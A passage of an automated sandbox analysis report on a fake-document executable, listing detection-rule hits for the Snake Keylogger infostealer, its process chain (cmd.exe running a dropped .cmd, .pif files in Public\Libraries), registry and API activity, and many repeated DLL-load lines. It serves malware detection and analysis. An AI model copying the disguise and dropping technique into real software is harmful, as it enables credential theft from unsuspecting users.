          Source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/7@4/4
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C7F5C GetDiskFreeSpaceA,0_2_029C7F5C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D6D50 CoCreateInstance,0_2_029D6D50
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Users\Public\CneehezxF.cmdJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_03
          Source: C:\Users\Public\Libraries\xzeheenC.pifMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A4_2_00413780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A4_2_00413780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A4_1_00413780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A9_2_00413780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A9_2_00413780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A9_1_00413780
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: xzeheenC.pif, 00000004.00000002.3471183670.000000001E3EB000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474258234.000000003564B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3471453220.0000000031E6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: D.G Governor Istek,Docx.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile read: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe "C:\Users\user\Desktop\D.G Governor Istek,Docx.exe"
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Cneehezx.PIF "C:\Users\Public\Libraries\Cneehezx.PIF"
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Cneehezx.PIF "C:\Users\Public\Libraries\Cneehezx.PIF"
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pifJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pifJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: url.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
